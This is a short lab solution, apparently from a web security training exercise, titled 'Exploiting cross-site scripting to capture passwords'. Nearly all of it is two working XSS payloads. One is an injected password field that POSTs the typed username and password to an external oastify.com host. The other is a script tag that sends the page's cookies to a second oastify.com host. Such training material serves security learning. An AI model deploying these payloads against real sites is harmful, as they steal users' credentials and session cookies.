22 - Exploiting cross-site scripting to capture passwords

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://mj9vemkvf7ziwd747oapqffxaogj4lsa.oastify.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value});">

<script>fetch("https://r6yg95bwjpga2e88we966k8ynpthhd52.oastify.com?" + document.cookie)</script>